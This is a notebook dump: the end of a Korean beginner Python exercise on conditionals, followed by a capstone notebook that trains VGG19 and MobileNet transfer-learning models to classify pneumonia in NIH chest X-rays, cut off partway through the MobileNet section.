if 조건1 :
수행 할 문장1
elif 조건2 :
수행 할 문장2
else :
수행 할 문장3
money = 20000
if money < 5000 :
print('라면을 먹는다')
elif 5000 < money < 25000 :
print('치킨을 먹는다')
elif 25000 < money < 50000 :
print('삼겹살을 먹는다')
else :
print('소고기를 먹는다')
###Output
치킨을 먹는다
###Markdown
연습문제 5 1번a와 b가 주어졌을 때, a 곱하기 b가 30 초과면 실패, 30이하면 성공이 출력되도록 만들어보자.
###Code
a = 6
b = 3
# 정답을 작성해 주세요.
###Output
성공
###Markdown
2번b로 a를 나눈 나머지가 3 초과면 실패, 3이면 무승부, 3 미만이면 성공이 출력되도록 만들어 보자
###Code
a = 3
b = 4
# 정답을 작성해 주세요.
# 정답을 작성해 주세요.
###Output
무승부
###Markdown
pass
###Code
money = 20000
card = True
if card :
if money < 30000 :
print("삼겹살을 먹는다")
else :
print("소고기를 먹는다")
else :
if money <= 1000 :
pass
else :
print("라면을 먹는다")
money = 1000
card = False
if card :
if money < 30000 :
print("삼겹살을 먹는다")
else :
print("소고기를 먹는다")
else :
if money <= 1000 :
pass
else :
print("라면을 먹는다")
###Output
_____no_output_____
###Markdown
연습문제 6 1번다음 코드를 실행했을 때의 결과를 예측해보자
###Code
3 <= 6
15 % 8 == 3
298 % 100 < 5
tmp = []
if tmp :
print('Not empty!')
else :
print("empty!")
tmp2 = [1,5,8,'e','n','.']
if 3 not in tmp2 :
print("X")
else :
print("O")
###Output
_____no_output_____
###Markdown
2번정부에서는 여름철 전력수급에 차질이 없도록 하기 위해서 실내온도가 26도이상일때만 에어컨을 사용할 수 있도록 권유하고 있다. 이에 맞춰 회사에서는 중앙냉난방을 제어하려고한다. 실내온도가 26도 미만일 경우 ‘선풍기’, 26도 이상일 경우 ‘에어컨’을 알려주도록 코딩을 해보자. (화면에 각 단어를 출력하기) 실제로 잘 작동하는지 온도를 바꾸어가면서 확인해봅시다.
###Code
temp = 29
# 정답을 작성해 주세요.
###Output
에어컨
###Markdown
3번숫자의 자릿수를 판별하는 기계를 만들려고 한다. 한자리수일 경우 1, 두자리 수 일 경우 2, 세자리 수 일 경우 3을 출력하는 조건문을 만들어보자.(주어지는 숫자는 세자리수 이하이다.)
###Code
num = 78
# 정답을 작성해 주세요.
# 정답을 작성해 주세요.
###Output
_____no_output_____ |
Final Capstone - Classifying Chest X-Rays/Using Deep Learning to Classify Chest X-Rays.ipynb | ###Markdown
Using Deep Learning for Medical ImagingIn the United States, it takes an average of [1 to 5 days](https://www.ncbi.nlm.nih.gov/pubmed/29132998) to receive a diagnosis after a chest x-ray. This long wait has been shown to increase anxiety in 45% of patients. In addition, impoverished countries usually lack personnel with the technical knowledge to read chest x-rays, assuming an x-ray machine is even available. In such cases, a [short term solution](https://www.theatlantic.com/health/archive/2016/09/radiology-gap/501803/) has been to upload the images online and have volunteers read the images; volunteers diagnose an average of 4000 CT scans per week. This solution works somewhat, but many people travel for days to a clinic and cannot keep traveling back and forth for a diagnosis or treatment, nor can those with more life threatning injuries wait days for a diagnosis. Clearly, there is a shortage of trained physicians/radiologists for the amount of care needed. To help reduce diagnosis time, we can turn to deep learning. Specifically, I will be using 3 pre-trained models (VGG19, MobileNet, and ResNet50) to apply transfer learning to chest x-rays. The largest database of chest x-ray images are compiled by the NIH Clinical Center and can be found [here](https://www.nih.gov/news-events/news-releases/nih-clinical-center-provides-one-largest-publicly-available-chest-x-ray-datasets-scientific-community). The database has 112,120 X-ray images from over 30,000 patients. There are 14 different pathologies/conditions and a 'no findings' label, for a total of 15 different labels. Due to time constraints, this notebook will go through the steps as I used transfer learning to train two of these labels: pneumonia and effusion. 1 - Retrieving the Data For this project, I used tensorflow and Keras for my deep learning library. Unfortunately, I ran into reproduciblity problems, which seems to be a common problem (see [machinelearningmastery](https://machinelearningmastery.com/reproducible-results-neural-networks-keras/) and this [StackOverflow question](https://stackoverflow.com/questions/48631576/reproducible-results-using-keras-with-tensorflow-backend)) which is why I set random seeds for python hash seed, numpy, and python in my import section.
###Code
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
import os
import cv2
import random
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
import os
import cv2
import random
from PIL import Image
import skimage
from skimage import io
from skimage.transform import resize
from numpy import expand_dims
from sklearn.model_selection import train_test_split
from sklearn.metrics import precision_score, recall_score,accuracy_score, f1_score, roc_curve, confusion_matrix, roc_curve,roc_auc_score
import tensorflow as tf
os.environ['PYTHONHASHSEED']='0'
np.random.seed(42)
random.seed(42)
import keras
from keras import backend as K
# import keras.backend.tensorflow_backend as K
tf.random.set_seed(42)
from keras.preprocessing.image import load_img, ImageDataGenerator, img_to_array
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Conv2D, GlobalAveragePooling2D, BatchNormalization
from keras.models import Model
from keras.optimizers import RMSprop, Adam
from keras.applications.vgg19 import preprocess_input, decode_predictions, VGG19
from keras.applications.mobilenet import MobileNet
from keras.applications.resnet import ResNet50
dirpath = 'all_images/'
alldata_df = pd.read_csv('./Data_Entry_2017.csv')
###Output
_____no_output_____
###Markdown
2 - Data ExplorationThe master dataframe below shows all the info we know regarding each image, including the image filename, label(s), patient information, and image height and width.
###Code
alldata_df.head()
###Output
_____no_output_____
###Markdown
2.1 - PathologiesOne thing to notice is that each image can have multiple labels. To isolate each individual pathology, I will create a column for each pathology and use 0 and 1 to indicate if the image has that pathology or not respectively.
###Code
alldata_df['Labels List'] = alldata_df['Finding Labels'].apply(lambda x: x.split('|'))
pathology_lst = ['Cardiomegaly', 'No Finding', 'Hernia', 'Infiltration', 'Nodule',
'Emphysema', 'Effusion', 'Atelectasis', 'Pleural_Thickening',
'Pneumothorax', 'Mass', 'Fibrosis', 'Consolidation', 'Edema',
'Pneumonia']
def get_label(col, pathology):
if pathology in col:
return 1
else:
return 0
for pathology in pathology_lst:
alldata_df[pathology] = alldata_df['Labels List'].apply(lambda x: get_label(x, pathology))
###Output
_____no_output_____
###Markdown
Below is a table of the percentage of each type of label that makes up the dataset. Not surprisingly, the 'no findings' label makes up the majority of the images, at about 50%. The two pathologies I'd like to train are pneumonia and effusion. Pneumonia, a pathology that most of us has heard of, takes up about 1.2% of the dataset whereas effusion is ~10%. This corresponds to a total of 1431 and 13317 images for pneumonia and effusion respectively. Due to the small amount of images available for pneumonia, I suspect it will be difficult to get good results.
###Code
alldata_df[pathology_lst].sum()/alldata_df.shape[0]*100
###Output
_____no_output_____
###Markdown
2.2 - Image DataThere are two things to explore with the image data before diving into creating models. Its useful to know the height and widths of the images, especially since the models I'm using are expecting a dimension of 224 x 224 pixels. The distribution of the heights and widths are shown in the histograms below. Most of the images have a height of 2000 pixels, although a good number of them hover at 2500 and 3000, with a minimum of ~970 pixels. The width of the images also has 3 distinct peaks, but the max is at 2500, and significant peaks at 2000 and 3000 pixels, with a minimum of ~1140 pixels. All the images have dimensions greater than 224.
###Code
fig, (axis1, axis2) = plt.subplots(1, 2, figsize=(15, 4))
sns.distplot(alldata_df['Height]'], ax = axis1)
sns.distplot(alldata_df['OriginalImage[Width'], ax = axis2)
axis1.set_title('Distribution of Image Height')
axis2.set_title('Distribution of Image Widths')
for ax in [axis1, axis2]:
ax.set_xlabel('Pixels')
ax.set_ylabel('Density')
plt.tight_layout()
###Output
/usr/local/lib/python3.5/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.
return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval
###Markdown
Another column is the view position. There are two unique values for this columns: PA and AP. These represent if the X-rays pass from the back to the front or vice versa. Thus, I'd like to find out if there are any stark differences in the images between the two view positions. Most of the images are in the PA viewing position. This is preferred because AP position creates 'shadows', but 'AP' images are taken because the patient is unable to stand up for the 'PA' position and need to lie down on a table.
###Code
alldata_df['View Position'].value_counts()/alldata_df.shape[0]*100
def get_images(filename_df, target_pathology, num_images = 500, imageSize = 224):
X = []
sample_df = filename_df.sample(n = num_images)
sample_df.reset_index(drop = True, inplace = True)
truncated_image_filename_lst = sample_df['Image Index'].values
full_image_filename_lst = []
for truncated_filename in truncated_image_filename_lst:
full_image_filename_lst.append(find_file(truncated_filename))
for i, file in enumerate(full_image_filename_lst):
img_file = cv2.imread(file)
img_file = cv2.resize(img_file, (imageSize, imageSize), interpolation = cv2.INTER_CUBIC)
img_arr = np.asarray(img_file)
if img_arr.shape == (224, 224, 3):
X.append(img_arr)
else:
sample_df.drop(i, inplace = True)
y = sample_df[target_pathology]
return np.array(X), np.array(y)
# images extractred from 12 files,
image_dir = sorted([dir for dir in os.listdir(dirpath) if 'images' in dir ])
def find_file(filename):
for dirfile in image_dir:
if filename in os.listdir(dirpath + dirfile + '/images'):
return dirpath + dirfile + '/images/' + filename
pa_images, _ = get_images(alldata_df[alldata_df['View Position']=='PA'], 'No Finding', num_images = 9, imageSize = 224)
ap_images, _ = get_images(alldata_df[(alldata_df['View Position']=='AP') & (alldata_df['No Finding']==1)], 'No Finding', num_images = 9, imageSize = 224)
###Output
_____no_output_____
###Markdown
Below I've plotted 16 images total. To make sure there aren't any differences due to pathologies, I only took from the 'no findings' label. The first 8 images are X-rays in the PA position (the majority), and the latter 8 images are in the AP position. The PA images seem to generally have a white mass near the bottom, although how much white varies from image to image. In addition, there is a small protrusion to the left of the spine, and a larger protrusion to the right of the spine. The AP images are similar, but much blurrier, possibly due to the shadows mentioned before.
###Code
plt.figure(figsize = (13, 6))
print('Images for PA view')
for i in range(8):
plt.subplot(2, 4, i+1)
tmp1 = pa_images[i].astype(np.uint8)
plt.imshow(tmp1)
plt.tight_layout()
plt.figure(figsize = (13, 6))
print('Images for AP view')
for i in range(8):
plt.subplot(2, 4, i+1)
tmp1 = ap_images[i].astype(np.uint8)
plt.imshow(tmp1)
plt.tight_layout()
###Output
Images for AP view
###Markdown
I looked at the percentages of AP vs PA view positions for 'pneumonia' and 'effusion', and threw in the overall percentage and 'no finding' for comparison. The overall and no findings are pretty close, with 'PA' positions at 60-65%. However, the 'PA' positions for 'pneumonia' and 'effusion' are lower, at 45-50%. Although removing 'AP' images might improve the models, for pneumonia it would leave too little images to train on.
###Code
pathology_percent_lst = ['No Finding', 'Pneumonia', 'Effusion']
pa_percent_lst = [alldata_df[(alldata_df[path]==1) & (alldata_df['View Position'] == 'PA')].shape[0]/alldata_df[(alldata_df[path]==1)].shape[0]*100 for path in pathology_percent_lst]
ap_percent_lst = [alldata_df[(alldata_df[path]==1) & (alldata_df['View Position'] == 'AP')].shape[0]/alldata_df[(alldata_df[path]==1)].shape[0]*100 for path in pathology_percent_lst]
pathology_percent_lst.insert(0, 'Overall')
pa_percent_lst.insert(0, alldata_df[alldata_df['View Position']=='PA'].shape[0]/alldata_df.shape[0]*100)
ap_percent_lst.insert(0, alldata_df[alldata_df['View Position']=='AP'].shape[0]/alldata_df.shape[0]*100)
ap_pa_percent_df = pd.DataFrame(np.array([pa_percent_lst, ap_percent_lst]),
columns = pathology_percent_lst,
index = ['PA', 'AP'])
ap_pa_percent_df
###Output
_____no_output_____
###Markdown
2.3 - Splitting into Training, Validation, and Test SetsLastly, the original [paper](http://openaccess.thecvf.com/content_cvpr_2017/papers/Wang_ChestX-ray8_Hospital-Scale_Chest_CVPR_2017_paper.pdf) split the images into training/validation and test sets and released that information to the public so we can easily compare our results to theirs. I have split my own data into the same training/validation, and test sets as the original authors.
###Code
train_val_filenames = pd.read_csv('./train_val_list.txt', sep=" ", header=None)
test_filenames = pd.read_csv('./test_list.txt', sep=" ", header=None)
train_val_filenames.shape[0] + test_filenames.shape[0]
train_val_df = alldata_df[alldata_df['Image Index'].isin(train_val_filenames.values.flatten())]
test_df = alldata_df[alldata_df['Image Index'].isin(test_filenames.values.flatten())]
###Output
_____no_output_____
###Markdown
3 - PneumoniaFirst, I will be performing transfer learning on pneumonia images. In order, the three models I will be using are VGG18, MobileNet, and ResNet50. 3.1 - VGG19 ModelFirst I must preprocess the images. The VGG model is expecting an image size of 224 x 224 pixels
###Code
imgSize = 224
###Output
_____no_output_____
###Markdown
Note: After writing this notebook, I realized my smaller test set should have the same distribution of pathologies as the original test set. This will be corrected the next time I improve upon this project.
###Code
# Get test images
Xtest_pneu, ytest_pneu = get_images(test_df[test_df['Pneumonia']==1],
'Pneumonia',
num_images = test_df[test_df['Pneumonia']==1].shape[0],
imageSize = imgSize)
Xtest_notpneu, ytest_notpneu = get_images(test_df[test_df['Pneumonia']==0],
'Pneumonia',
num_images = test_df[test_df['Pneumonia']==1].shape[0],
imageSize = imgSize)
X_test_pneu = np.concatenate((Xtest_pneu, Xtest_notpneu), axis = 0)
y_test_pneu = np.concatenate((ytest_pneu, ytest_notpneu))
###Output
_____no_output_____
###Markdown
I use sklearn's train_test_split function to shuffle test set. Unfortunately that means I lose 1% of the images, so it leaves me with 1099 images total in the test set.
###Code
_, X_test_pneu, _, y_test_pneu = train_test_split(X_test_pneu,
y_test_pneu,
test_size=0.99,
random_state=42,
stratify = y_test_pneu)
###Output
_____no_output_____
###Markdown
The training and validation sets have a total of 1752 and 351 images respectively.
###Code
# get training images and split into validation set
Xtrain_pneu, ytrain_pneu = get_images(train_val_df[train_val_df['Pneumonia']==1],
'Pneumonia',
num_images = train_val_df[train_val_df['Pneumonia']==1].shape[0],
imageSize = imgSize)
Xtrain_notpneu, ytrain_notpneu = get_images(train_val_df[train_val_df['Pneumonia']==0],
'Pneumonia',
num_images = train_val_df[train_val_df['Pneumonia']==1].shape[0],
imageSize = imgSize)
Xtrain_pneu = np.concatenate((Xtrain_pneu, Xtrain_notpneu), axis = 0)
ytrain_pneu = np.concatenate((ytrain_pneu, ytrain_notpneu))
X_train_pneu, X_val_pneu, y_train_pneu, y_val_pneu = train_test_split(Xtrain_pneu,
ytrain_pneu,
test_size=0.2,
random_state=42,
stratify = ytrain_pneu)
###Output
_____no_output_____
###Markdown
Next, I need to convert the images into a format accepted by the VGG model.
###Code
def convert_X_data(Xtrain, Xval, Xtest, imageSize = 224, num_classes = 2):
if K.image_data_format() == 'channels_first':
Xtrain_model = Xtrain.reshape(Xtrain.shape[0], 3, imageSize, imageSize)
Xval_model = Xval.reshape(Xval.shape[0], 3, imageSize, imageSize)
Xtest_model = Xtest.reshape(Xtest.shape[0], 3, imageSize, imageSize)
else:
Xtrain_model = Xtrain.reshape(Xtrain.shape[0], imageSize, imageSize, 3)
Xval_model = Xval.reshape(Xval.shape[0], imageSize, imageSize, 3)
Xtest_model = Xtest.reshape(Xtest.shape[0], imageSize, imageSize, 3)
# input_shape = (img_rows, img_cols, 1)
Xtrain_model = Xtrain_model.astype('float32')
Xval_model = Xval_model.astype('float32')
Xtest_model = Xtest_model.astype('float32')
Xtrain_model = preprocess_input(Xtrain_model)
Xval_model = preprocess_input(Xval_model)
Xtest_model = preprocess_input(Xtest_model)
return Xtrain_model, Xval_model, Xtest_model
def convert_y_data(ytrain, yval, ytest, num_classes = 2):
ytrain_model = keras.utils.to_categorical(ytrain, num_classes)
yval_model = keras.utils.to_categorical(yval, num_classes)
ytest_model = keras.utils.to_categorical(ytest, num_classes)
return ytrain_model, yval_model, ytest_model
X_train_pneu_model, X_val_pneu_model, X_test_pneu_model = convert_X_data(X_train_pneu,
X_val_pneu,
X_test_pneu,
imageSize = imgSize,
num_classes = 2)
y_train_pneu_model, y_val_pneu_model, y_test_pneu_model = convert_y_data(y_train_pneu,
y_val_pneu,
y_test_pneu,
num_classes = 2)
###Output
_____no_output_____
###Markdown
Lastly, keras only has built in functions for accuracy and loss. I am interested in looking at accuracy, precision, recall, and f1 scores however, so I will write my own function to get these metrics. The two metrics I'm most concerned about are the recall and f1-score. I am interested in the recall because for a medical related dataset, I believe it is best to reduce false negatives. However, I know there are cases where the model can predict all 0 or all 1, which would skew the precision and recalls. As such, it is important to look at f1-scores as well.
###Code
def get_metrics(model, xtest, ytrue, verbose = True):
y_pred_probs = model.predict(xtest)
try:
y_pred_classes = model.predict_classes(xtest)
except AttributeError:
y_pred_classes = [np.argmax(i) for i in y_pred_probs]
y_pred_probs = y_pred_probs[:, 0]
try:
y_pred_classes = y_pred_classes[:, 0]
except: #IndexError:
pass
if verbose:
print('Accuracy Score: {}'.format(accuracy_score(ytrue, y_pred_classes)))
print('Precision Score: {}'.format(precision_score(ytrue, y_pred_classes)))
print('Recall: {}'.format(recall_score(ytrue, y_pred_classes)))
print('F1 Score: {}'.format(f1_score(ytrue, y_pred_classes)))
print('Confusion matrix: \n{}'.format(confusion_matrix(ytrue, y_pred_classes)))
return accuracy_score(ytrue, y_pred_classes), precision_score(ytrue, y_pred_classes), recall_score(ytrue, y_pred_classes), f1_score(ytrue, y_pred_classes)
###Output
_____no_output_____
###Markdown
3.1.1 - VGG Baseline with Pneumonia ImagesThe first step is to establish what the baseline metrics will be for the VGG model. To do this, first I import the layers from the VGG model. Since this model was trained on the ImageNet dataset, it expects to predict from 1000 classes. I replace this last layer with a dense layer with 2 classes and softmax activation, and compile the model with keras's categorical cross entropy loss function. Lastly, due to the reproducibility issues mentioned in the beginning, I run the model 3 times and average the metrics and show the standard deviation.For the baseline metric, the model has an accuracy of ~50% while the precision is ~0.55 and recall and f1 score at ~0.23, so this is just about as good as flipping a coin given that the test set is balanced. In addition, the standard deviation for the recall and precision scores are just about as big as the averaged scores themselves, so the reliability of this baseline model is very poor.
###Code
num_classes = 2
vgg_model = VGG19()
vgg_baseline_acc_scores = []
vgg_baseline_prec_scores = []
vgg_baseline_recall_scores = []
vgg_baseline_f1_scores = []
for i in range(3):
vgg_model_baseline = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_baseline.add(layer)
vgg_model_baseline.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_baseline.layers:
layer.trainable = False
vgg_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_baseline_history = vgg_model_baseline.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model, y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(vgg_model_baseline, X_test_pneu_model, y_test_pneu, verbose = True)
vgg_baseline_acc_scores.append(acc)
vgg_baseline_prec_scores.append(prec)
vgg_baseline_recall_scores.append(recall)
vgg_baseline_f1_scores.append(f1)
print('Accuracy of VGG baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_baseline_acc_scores) * 100, np.std(vgg_baseline_acc_scores)*100))
print('Precision of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_prec_scores), np.std(vgg_baseline_prec_scores)))
print('Recall of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_recall_scores), np.std(vgg_baseline_recall_scores)))
print('f1 score of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_f1_scores), np.std(vgg_baseline_f1_scores)))
###Output
Accuracy of VGG baseline model: 49.50 +/- 1.29%
Precision of VGG baseline model: 0.545 +/- 0.055
Recall of VGG baseline model: 0.236 +/- 0.279
f1 score of VGG baseline model: 0.229 +/- 0.226
###Markdown
3.1.2 - Training Layers with VGG19 and Pneumonia ImagesA way to fine tune and hopefully improve upon this baseline model is to unfreeze certain layers. That is, the weights imported by the VGG (or any) model is optimized for the ImageNet dataset. Unfreezing layers allows the model to learn the features of your current dataset. Typically, the first layers of the models are kept frozen as they are able to extract big/common features, while the last layers are able to extract features that are more specific to your dataset. VGG19 has 26 layers, and I found that it is optimal to train the last 4 layers, leaving the first 22 layers frozen. With this model, the accuracy rises slightly to ~53% while the precision stays the same. Recall and f1-score rises to over 0.60. In addition, standard deviations have drastically reduced.
###Code
vgg_frozen_acc_scores = []
vgg_frozen_prec_scores = []
vgg_frozen_recall_scores = []
vgg_frozen_f1_scores = []
for i in range(3):
vgg_model_frozen = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_frozen.add(layer)
vgg_model_frozen.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_frozen.layers[:-4]:
layer.trainable = False
vgg_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_frozen_history = vgg_model_frozen.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model, y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(vgg_model_frozen, X_test_pneu_model, y_test_pneu, verbose = True)
vgg_frozen_acc_scores.append(acc)
vgg_frozen_prec_scores.append(prec)
vgg_frozen_recall_scores.append(recall)
vgg_frozen_f1_scores.append(f1)
print('Accuracy of VGG model with last 4 layers trained: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_frozen_acc_scores) * 100, np.std(vgg_frozen_acc_scores)*100))
print('Precision of VGG model with last 4 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_prec_scores), np.std(vgg_frozen_prec_scores)))
print('Recall of VGG model with last 4 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_recall_scores), np.std(vgg_frozen_recall_scores)))
print('f1 score of VGG model with last 4 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_f1_scores), np.std(vgg_frozen_f1_scores)))
###Output
Accuracy of VGG model with last 4 layers trained: 53.75 +/- 0.43%
Precision of VGG model with last 4 layers trained: 0.525 +/- 0.006
Recall of VGG model with last 4 layers trained: 0.800 +/- 0.105
f1 score of VGG model with last 4 layers trained: 0.631 +/- 0.031
###Markdown
3.1.3 - Adding Augmented Images to VGG19 Model with Pneumonia ImagesSo far, I've been able to get an ok f1 score, but an accuracy of 55% concerns me because that's barely doing beter than randomly guessing if an image shows pneumonia or not. I believe part of that is the low number of images in the training set, with a total of 1752 images. Normally, a deep learning model will want hundreds of thousands of images. To help with this, I can generate images from the ones I already have by altering them. The alterations are defined in the Image Data Generator function below, but to summarize, the image generator can zoom, shift the image horizontally, or shift the image vertically. If the image is shifted, black pixels fill in the empty space.As usual, I want to get a baseline for this augmented images model. Unfortunately, the metrics seem to be similar to the non-augmented baseline scores.
###Code
gen = ImageDataGenerator(zoom_range=0.05,
height_shift_range=0.05,
width_shift_range=0.05,
fill_mode = 'constant',
cval = 0)
vgg_aug_baseline_acc_scores = []
vgg_aug_baseline_prec_scores = []
vgg_aug_baseline_recall_scores = []
vgg_aug_baseline_f1_scores = []
for i in range(3):
vgg_model_aug_baseline = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_aug_baseline.add(layer)
vgg_model_aug_baseline.add(Dense(num_classes, activation = 'softmax'))
for layer in vgg_model_aug_baseline.layers:
layer.trainable = False
vgg_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_aug_baseline_history = vgg_model_aug_baseline.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(vgg_model_aug_baseline, X_test_pneu_model, y_test_pneu, verbose = True)
vgg_aug_baseline_acc_scores.append(acc)
vgg_aug_baseline_prec_scores.append(prec)
vgg_aug_baseline_recall_scores.append(recall)
vgg_aug_baseline_f1_scores.append(f1)
print('Accuracy of VGG augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_aug_baseline_acc_scores) * 100, np.std(vgg_aug_baseline_acc_scores)*100))
print('Precision of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_prec_scores), np.std(vgg_aug_baseline_prec_scores)))
print('Recall of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_recall_scores), np.std(vgg_aug_baseline_recall_scores)))
print('f1 score of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_f1_scores), np.std(vgg_aug_baseline_f1_scores)))
###Output
Accuracy of VGG augmented baseline model: 51.08 +/- 0.79%
Precision of VGG augmented baseline model: 0.548 +/- 0.022
Recall of VGG augmented baseline model: 0.245 +/- 0.286
f1 score of VGG augmented baseline model: 0.244 +/- 0.237
###Markdown
Again, I'd like to fine tune the augmented image model by letting some layers be trainable. I found the optimal number of trainable layers to be 5. The accuracy of the augmented model with trainable layers is slightly higher, but the standard deviation is also larger, and the precision, recall, and f1-score are either the same or lower than the baseline model with trainable layers.
###Code
vgg_aug_frozen_acc_scores = []
vgg_aug_frozen_prec_scores = []
vgg_aug_frozen_recall_scores = []
vgg_aug_frozen_f1_scores = []
for i in range(3):
vgg_model_aug_frozen = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_aug_frozen.add(layer)
vgg_model_aug_frozen.add(Dense(num_classes, activation = 'softmax'))
for layer in vgg_model_aug_frozen.layers[:-5]:
layer.trainable = False
vgg_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_aug_frozen_history = vgg_model_aug_frozen.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(vgg_model_aug_frozen, X_test_pneu_model, y_test_pneu, verbose = True)
vgg_aug_frozen_acc_scores.append(acc)
vgg_aug_frozen_prec_scores.append(prec)
vgg_aug_frozen_recall_scores.append(recall)
vgg_aug_frozen_f1_scores.append(f1)
print('Accuracy of VGG augmented model with last 5 layers trained: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_aug_frozen_acc_scores) * 100, np.std(vgg_aug_frozen_acc_scores)*100))
print('Precision of VGG augmented model with last 5 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_prec_scores), np.std(vgg_aug_frozen_prec_scores)))
print('Recall of VGG augmented model with last 5 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_recall_scores), np.std(vgg_aug_frozen_recall_scores)))
print('f1 score of VGG augmented model with last 5 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_f1_scores), np.std(vgg_aug_frozen_f1_scores)))
###Output
Accuracy of VGG augmented model with last 5 layers trained: 54.14 +/- 1.30%
Precision of VGG augmented model with last 5 layers trained: 0.538 +/- 0.004
Recall of VGG augmented model with last 5 layers trained: 0.573 +/- 0.141
f1 score of VGG augmented model with last 5 layers trained: 0.546 +/- 0.074
###Markdown
3.1.4 - VGG19 Pnuemonia Summary for Pneumonia ImagesA table that summarizes the metrics of the VGG model for pneumonia is below. Overall, it shows that the best VGG model comes from the baseline model while training the last 4 layers, as it has the highest recall and f1-score. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| VGG19 baseline | 49.50 +/- 1.29%| 0.545 +/- 0.055 | 0.236 +/- 0.279| 0.229 +/- 0.226 || VGG19 baseline with training | 53.75 +/- 0.43% | 0.525 +/- 0.006 | 0.800 +/- 0.105 | 0.631 +/- 0.031 || VGG19 augmented baseline | 51.08 +/- 0.79% | 0.548 +/- 0.022 | 0.245 +/- 0.286 | 0.244 +/- 0.237 || VGG19 augmented with training | 54.14 +/- 1.30% | 0.538 +/- 0.004 | 0.573 +/- 0.141 | 0.546 +/- 0.074 | 3.2 - MobileNet ModelThe next model to try is MobileNet model. This model also expects images of 224 x 224, so the training and test sets are already set up. 3.2.1 - MobileNet Baseline with Pneumonia ImagesThe rest of the notebook follows the same steps as the VGG model, so here I'll be establishing the baseline metrics for MobileNet. Here I use the argument include_top = False. When compared to the original MobileNet model however, this takes away the last two layers of the model instead of just one. To make up for this, I have to include the GlobalAveragePooling2D layer back in. For MobileNet's baseline, accuracy is again at ~50% whereas the precision is slightly worse and the recall and f1 score are slightly better than VGG's baseline. All of these metrics are lower than the best VGG model.
###Code
mobilenet_model = MobileNet(include_top=False, input_shape=(imgSize, imgSize, 3))
mobilenet_baseline_acc_scores = []
mobilenet_baseline_prec_scores = []
mobilenet_baseline_recall_scores = []
mobilenet_baseline_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_baseline.layers:
layer.trainable = False
mobilenet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_baseline_history = mobilenet_model_baseline.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(mobilenet_model_baseline,
X_test_pneu_model,
y_test_pneu)
mobilenet_baseline_acc_scores.append(acc)
mobilenet_baseline_prec_scores.append(prec)
mobilenet_baseline_recall_scores.append(recall)
mobilenet_baseline_f1_scores.append(f1)
